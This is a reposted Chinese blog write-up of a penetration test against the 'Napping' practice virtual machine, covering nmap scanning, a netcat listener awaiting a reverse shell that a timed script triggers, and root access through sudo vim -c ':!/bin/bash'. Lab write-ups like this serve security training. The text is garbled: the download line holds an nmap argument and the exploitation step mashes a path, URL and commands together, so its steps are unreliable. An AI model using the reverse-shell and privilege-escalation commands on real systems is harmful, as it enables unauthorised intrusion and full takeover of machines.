Napping靶机测试记录

网友投稿 251 2022-10-03


Napping靶机测试记录

靶机信息

下载地址:-sn 192.168.1.0/24

对目标做进一步的扫描

nmap -A 192.168.1.104

漏洞利用

在kali的/var/http://192.168.1.104/index.php mv index.php index.html vim test.html

开启-m 80 nc -lvp 666

权限提升

等两分钟脚本定时执行后,即可回连到adrian账户sudo -l看一下,发现可以用root权限免密执行vim进行vim提权

sudo vim -c ':!/bin/bash'


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

标签:http
上一篇:信息安全深透测试与工房(十一)操作系统弱点扫描
下一篇:OneAuth Cloud UD 特性介绍(Oneauth和authing)
相关文章

 发表评论

暂时没有评论,来抢沙发吧~